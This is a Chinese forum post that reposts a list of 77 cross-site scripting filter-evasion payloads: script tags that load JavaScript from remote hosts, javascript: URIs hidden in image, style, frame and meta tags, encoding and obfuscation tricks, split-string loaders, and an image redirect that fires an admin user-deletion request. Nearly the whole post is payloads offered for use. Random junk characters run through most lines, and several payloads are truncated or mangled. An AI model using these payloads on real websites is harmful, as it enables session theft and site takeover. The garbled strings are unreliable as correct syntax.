貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
$ |8 ?& \0 e7 o2 \
; n- N8 z- V1 F/ i (1)普通的XSS JavaScript注入
3 `: y% g2 N; ] <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: b3 E" o% C( q
1 \5 I9 M b9 y6 n4 j( `
(2)IMG标签XSS使用JavaScript命令
' a3 N2 F- o2 ] l0 x. L& Y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ D$ W. y, j1 m! \/ J
) f3 A+ O8 R7 q! r7 b5 O! f
(3)IMG标签无分号无引号
; N) |+ k V. C <IMG SRC=javascript:alert(‘XSS’)>
4 y( c& t! j H
$ ^/ R' g6 A( ~) b1 t; P (4)IMG标签大小写不敏感
1 x9 y5 O! y$ }+ \" v5 D8 ^ <IMG SRC=JaVaScRiPt:alert(‘XSS’)>& S7 J0 c# p5 A8 M* B V/ w7 Z
( o& L% E/ ]. }2 G- G (5)HTML编码(必须有分号)7 I* @! A: Z$ y! q8 E/ P% u' e
<IMG SRC=javascript:alert(“XSS”)>4 C2 \5 X: E1 a; l4 Z+ x. |
% W% Y: i+ G; b (6)修正缺陷IMG标签5 z. {# t' [0 [- F: X: [
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: a1 x, i0 W/ e5 c! N
* }4 S H# d% \, o6 s( {5 _
(7)formCharCode标签(计算器)1 m7 t+ `% @% A5 }+ b
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 }! j1 N0 i1 D, m8 R' S7 e" E0 W" N5 K. m6 P
(8)UTF-8的Unicode编码(计算器)4 U0 \/ {( w. m! R; f8 Q
<IMG SRC=jav..省略..S')>0 p9 z; A4 C6 z+ [
& P# }; G4 P7 b) B! }/ {
(9)7位的UTF-8的Unicode编码是没有分号的(计算器) w6 T" N4 g; @5 j
<IMG SRC=jav..省略..S')>
! h6 A8 G3 S2 ?8 v% L
" t2 |1 l0 a8 Q* J) Z! I) C* x (10)十六进制编码也是没有分号(计算器)
0 d% |( ~; v1 i* F4 n: Q8 F; F <IMG SRC=java..省略..XSS')>
# M& H5 ?* W4 y; n' N
, P0 f1 _1 D* V* e2 Z8 o1 _ b (11)嵌入式标签,将Javascript分开
5 O7 Q+ t' @* w) ` <IMG SRC=”jav ascript:alert(‘XSS’);”>' @ J) n- w% G9 h$ c3 }
9 e$ X$ v/ n- q
(12)嵌入式编码标签,将Javascript分开+ t! f5 O0 B. o, Q$ |4 _: a- ~$ B
<IMG SRC=”jav ascript:alert(‘XSS’);”>: q" [6 v7 P8 J. L; p' F
0 X. S) G ]4 M# e8 A% |1 }
(13)嵌入式换行符
6 H+ q, l7 Y- G# N <IMG SRC=”jav ascript:alert(‘XSS’);”>0 S/ C, ~0 o- l& q. k3 \
- M2 H9 a( j: r
(14)嵌入式回车4 K3 ~+ C' g' V" b$ `
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 _. i0 C3 {! }' c
) C, X; Z8 l! a; D \
(15)嵌入式多行注入JavaScript,这是XSS极端的例子' `4 `& b- a2 O6 w5 n8 }7 [
<IMG SRC=”javascript:alert(‘XSS‘)”>
* g; I5 Q, }; _5 \; o$ w, T, m$ l
9 J% H3 p: Z" [ [ (16)解决限制字符(要求同页面)
6 L4 \; x4 h! g! A" B: S, D <script>z=’document.’</script>
; F$ z$ J) p3 m& r5 n( t/ Z, e <script>z=z+’write(“‘</script># ?* n3 k |- A
<script>z=z+’<script’</script>* t/ r! p! d6 B. c# d+ Q8 Q* D' i
<script>z=z+’ src=ht’</script># M) _( o1 R; T! J6 u1 o: w- g# j
<script>z=z+’tp://ww’</script>
$ q* U: g3 Y+ B2 R <script>z=z+’w.shell’</script>, B9 Q7 m' a# ]# J
<script>z=z+’.net/1.’</script>
. m: ?: T. U7 h5 y6 c K <script>z=z+’js></sc’</script>; j0 Q: N' D T* |; e: z8 ~
<script>z=z+’ript>”)’</script>3 D# _2 V' |+ U6 \4 L0 J
<script>eval_r(z)</script>
4 [( X. e0 T) M* i/ C, H
: [! k/ o+ g4 P8 s0 I1 U (17)空字符
6 G4 x. _3 x7 e# h5 ?' }; e$ X5 @: p perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
. T" }+ \" X: X8 ?' S6 n
6 o6 B0 Z! l$ f; S9 U8 u0 Z (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 R! I) G) Y0 m$ h perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- N: A& a$ j! o3 I
|5 P" V. E% ?4 X" s3 b- k, u (19)Spaces和meta前的IMG标签
) W) ^! C, A: ^! k m8 l1 a, ] <IMG SRC=” � javascript:alert(‘XSS’);”>
4 ~, i6 x: o) D' V D& Q4 o% G& O$ C: X5 Q0 N% r3 D
(20)Non-alpha-non-digit XSS" e' v) Q2 }4 {& g" c) |+ I, ~
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& b+ p. e* g3 l7 _+ N0 B) `
) L2 e0 z( R" }4 B
(21)Non-alpha-non-digit XSS to 2
S4 H% F/ X. [8 Q$ Z5 R <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 F- I; D4 X& F7 P- T3 d+ j$ o9 \' S* m. o
(22)Non-alpha-non-digit XSS to 35 U( [/ a* y5 w( N8 m6 G+ C3 n
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- P$ r8 H+ R: |
5 \: j; Z/ k+ ^ (23)双开括号
, s1 R/ K! O: o- F% A; H2 t <<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 d5 A) Q$ t' Z$ i3 a. L5 k2 {+ {- s& M: z# @7 M3 I
(24)无结束脚本标记(仅火狐等浏览器)
6 [% @! H' ?! z3 |( ~" J* U <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" o/ l$ `% d4 a- G* {# ?. e
$ N8 L6 A2 t2 }$ ]' Q (25)无结束脚本标记26 y) \% j2 u8 {$ e
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 G4 E; O( [7 C
0 I7 u/ c0 M3 k3 R (26)半开的HTML/JavaScript XSS
1 A! \' l! h5 z% u, c" N8 R$ @ <IMG SRC=”javascript:alert(‘XSS’)”9 P" J' N6 s0 T. l$ Y, F8 |* W3 p! ^
. m$ @5 L$ a4 p* z, `; x
(27)双开角括号& }0 C) K$ ~6 c& _" x9 Y* j. ]5 Z
<iframe src=http://3w.org/XSS.html <
a7 A) ~4 w2 a% X/ C
9 e' k6 r. U5 O/ e% w (28)无单引号 双引号 分号
% E3 H* g9 m) N6 U+ l <SCRIPT>a=/XSS/( g& l8 d) _& p' Z% Y4 t3 N. [
alert(a.source)</SCRIPT>
4 c U. g, u( \
, r$ G# p9 s! u( N& v (29)换码过滤的JavaScript
5 n- q' _ A4 F# x; E! U K+ i \”;alert(‘XSS’);//; g1 D5 q# K2 h0 J( D: W
& ?! O& |( M8 S0 J4 ~ (30)结束Title标签8 }% U$ f* G4 |9 {% X. v3 ]
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: c: U) y+ P! [' [* G, \& n, Y' [2 e( C/ u/ A
(31)Input Image
, u' Y5 |' A' b. L <INPUT SRC=”javascript:alert(‘XSS’);”>
3 J/ p" W+ O! S6 x9 _8 G J+ s& ]
(32)BODY Image
: |- g C X+ l! X4 |% P <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 N' X$ r, h) k( B' q1 h- G( `$ D" c: l
(33)BODY标签9 w5 \. B4 ], X* i( Y) z
<BODY(‘XSS’)>
4 U7 Y- v2 n. J+ w: a: Z5 _
$ C) t( I- ^4 h (34)IMG Dynsrc
5 Z- p7 [& f( | p <IMG DYNSRC=”javascript:alert(‘XSS’)”>
, }4 V! i: t; \) w3 E# G9 n
% S/ r5 i7 ~9 f2 f. [; q$ Y (35)IMG Lowsrc
$ H6 B6 i9 g/ }& J <IMG LOWSRC=”javascript:alert(‘XSS’)”>
+ c$ B9 t/ p( }$ |% i; ~4 U: b" W0 r1 F6 f1 y3 T
(36)BGSOUND
, @7 d( \0 B3 a <BGSOUND SRC=”javascript:alert(‘XSS’);”># F; [( r' s9 X" _! R
$ k' D3 z' f3 f# D4 u (37)STYLE sheet
0 V- n0 c( _- k W4 E: U <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 S( _* b3 D2 X/ `5 N0 j4 v: t7 ?, \4 m! {' G3 |+ }2 n; a
(38)远程样式表
+ [% p* ~ h& [. r <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>, E" M3 B- ^) N
7 c: a. ]* q) S( ~: x (39)List-style-image(列表式)/ j2 a9 u+ w+ W `" T9 x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 V9 p: {9 T6 U( S
P+ L, b4 O. O7 B( [$ `. I* O0 m (40)IMG VBscript
+ I3 }0 H! _; L" C) J# D) S% c <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. _5 w# _2 T6 ^- z' }
+ |0 V% u) Y4 m1 f
(41)META链接url
- g0 r E" I+ V/ ?8 ~9 g <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 K% V! v* ~( s. [! |1 e' |
. K; @" y9 j2 R. @ (42)Iframe
* P4 y- h+ B. r& D! g8 _, l, N* I6 v <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- |. ^/ W+ E8 }$ f' @( s) g4 e
. i$ D5 X: T% j! ~ (43)Frame
( i& j' G* r$ n: e. o- R5 K <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
1 I: J C2 ^6 s+ U1 `, Y! V, `
! I* _) N$ F6 ?: l) o (44)Table
9 P% @) ~& r& d# G9 @ <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) p! A: T% s/ m9 Z9 o8 |
1 ?0 [3 a. l0 c* D
(45)TD+ m; x/ c# l# d8 A2 b
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' Q0 A% B9 x* T G/ e
; o% H) F% p! h/ Z7 O5 y3 [ (46)DIV background-image
8 c% a2 p9 Z! l0 a9 ~; K! s* O1 ?4 H <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ X+ ]$ v2 b: S2 ^6 q" h. i
. i7 q# W6 f% X# X
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" F% a8 W- t' O% y
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
" X, R" J$ W+ c: c. V' n2 o3 S4 ?: J5 n5 j6 K6 N7 q1 [
(48)DIV expression
9 p I# p. j" r6 Y$ E7 v <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* [5 M, a6 Z; ?, X) Q4 b9 c' Q. I7 l; D( b2 t7 ]* w! H; i
(49)STYLE属性分拆表达% N! ?7 L# k4 p& p3 s2 l
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>; P8 ]) l2 g5 J: u( z1 w3 z; Z+ S
- R$ s' h7 _. m$ q ^+ T' \
(50)匿名STYLE(组成:开角号和一个字母开头)
9 ?, O K: _5 R <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; q7 x5 S& L0 ^ o# ?0 o
5 t, }3 [7 W8 i) |/ L# ? (51)STYLE background-image
6 p1 J4 U M, ~ K- ~3 i1 g, F& p. [" L6 t <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" W7 P; o, ?# m) m
t5 T2 f+ A% R- y3 Z (52)IMG STYLE方式4 C. F' B* j% `$ \/ Q- Z- J
exppression(alert(“XSS”))’>2 |' g' C. U7 h
8 s: V w/ \2 ]2 d$ K( B- K (53)STYLE background7 J% R, t( c1 C1 n: Z
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) ~3 U \5 A/ {$ X0 [
0 B" y! ]3 B5 M# J( F* u (54)BASE
8 h8 \9 U- Q+ ~) {7 y <BASE HREF=”javascript:alert(‘XSS’);//”>
* H) L5 y+ M% p5 H# j
7 q, b, P' u# Y8 P) y. ^ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( w _' u: |+ ~
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* j: A* k/ X' z: |$ h3 `+ Y0 _6 R [- Q3 f; ?
(56)在flash中使用ActionScrpt可以混进你XSS的代码/ e5 q4 q# V2 c$ n, K( }( r
a=”get”;9 l G7 K9 I; q
b=”URL(\”";
- \, O* x5 g# s, y$ J) V m c=”javascript:”;" G6 u& O% F. ^% P
d=”alert(‘XSS’);\”)”;
6 _/ U0 c& R- C; D( N# | eval_r(a+b+c+d);
& U$ O! ^+ P" X0 H1 E6 x! B5 u* U5 M: ^/ g6 k* E
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上! `/ q3 f6 a: }, C& r$ L
<HTML xmlns:xss>
! J. \) m4 c* S; k <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 K- z1 a3 X* R- k <xss:xss>XSS</xss:xss>, ?. R; H* y$ j' c2 n0 D
</HTML>$ x! U9 I! m( s$ H- D7 ] w( `# r: D
4 g+ C1 B( P1 E) Y (58)如果过滤了你的JS你可以在图片里添加JS代码来利用* \" L2 }. }, h+ b4 m6 X1 u
<SCRIPT SRC=””></SCRIPT>6 F$ E ?$ X) K b
. \* D$ K& @9 y/ E L7 { (59)IMG嵌入式命令,可执行任意命令7 d/ b6 ]! b! G% {
<IMG SRC=”http://www.XXX.com/a.php?a=b”>( e9 u& O4 m+ f2 G8 X
! B. o- a' ]7 t, n (60)IMG嵌入式命令(a.jpg在同服务器)
' t4 u4 g+ ^# V' y. Q H Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% v U- H Y& K1 B C' x, w5 V: p) K8 d
: u' u. g/ o. m2 u2 z/ A (61)绕符号过滤
% i4 |$ `, X% U. z5 V- c0 K0 j <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ G, s3 [) J& ?5 v$ p
( ~9 [) W' n- R/ ^ (62)
y, B) T8 e+ E% }2 N0 O3 a <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* |- B0 a2 z3 g3 \8 C+ S& [
5 B4 I6 M- U4 K (63)
$ k, K2 g/ {) _ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 h) U( V2 c6 i7 w% b7 r5 R5 \
# G, Y6 y+ l9 C; O
(64)
9 y' x6 J' h( [. Q% o' H: L! a <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 N2 R! h1 z0 b" ^) N' x k; L m# F8 @5 l
(65)6 S p6 ^( O( x' a/ f& o$ ~
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* ^- H. i+ V/ Y% A) J2 d1 Z
9 E2 n" q2 V% Y. }* P1 K. g (66)% v. x# c; \' f) B7 ^6 e3 {
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 _3 N) r' S, l
0 R8 ?) x- w$ N0 e4 y7 i& b; r
(67)* C9 P1 c6 D S% X4 i) j
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>4 {5 X2 o1 J" _6 q
# r+ ?% R" Z0 h# U
(68)URL绕行
' B# W. A8 K8 |5 e- S3 o2 n8 x% f <A HREF=”http://127.0.0.1/”>XSS</A>0 U% X9 r/ E9 [. I( h
+ s( M% [9 K& K/ E (69)URL编码( y" e2 P0 J! c8 G7 H# i3 m
<A HREF=”http://3w.org”>XSS</A>
9 ~# @3 z: s$ _) e. m0 ]' ]6 z: K5 x" b
(70)IP十进制
2 _# v; a7 e5 H6 X1 d: w/ A9 V <A HREF=”http://3232235521″>XSS</A>, i4 m6 l; I& k4 i2 u: p
' U9 ]9 Z. t7 S z2 U% D, e- o (71)IP十六进制) J" _& x: D* m
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>% F/ H9 _: g3 [& I6 D
% _1 _% q n% @
(72)IP八进制
7 @$ @; [/ E b' }- ^ <A HREF=”http://0300.0250.0000.0001″>XSS</A>/ `3 h$ m* Y0 q+ n( ]
3 z- C7 O/ e% I0 J- }" Z9 W9 l& Q
(73)混合编码* R" M) ^- x1 W8 h! d& k3 w8 w* ?
<A HREF=”h, M" j/ b8 T6 ~
tt p://6 6.000146.0×7.147/”">XSS</A>
+ u; `& I* P$ e( _ R. Z, f% D3 p+ s7 q
(74)节省[http:]
( B/ [! y8 I0 q <A HREF=”//www.google.com/”>XSS</A>$ r+ \' J% X ?. V
# C9 L/ Z' i) L1 ?5 r# Y; s. \
(75)节省[www]
0 G0 a# x0 T) j% W <A HREF=”http://google.com/”>XSS</A>
5 n% J1 ]7 G, a) O+ F; ~8 m9 K! M
7 D( f: U4 @" ~- Q+ P- K (76)绝对点绝对DNS4 r& R3 e4 }/ Z2 ?' ~& s' S
<A HREF=”http://www.google.com./”>XSS</A>5 q9 C; G9 w( f' Q+ P
: _; B8 R& P0 q7 t (77)javascript链接
; K, e8 E2 Z: e) u- d3 i <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对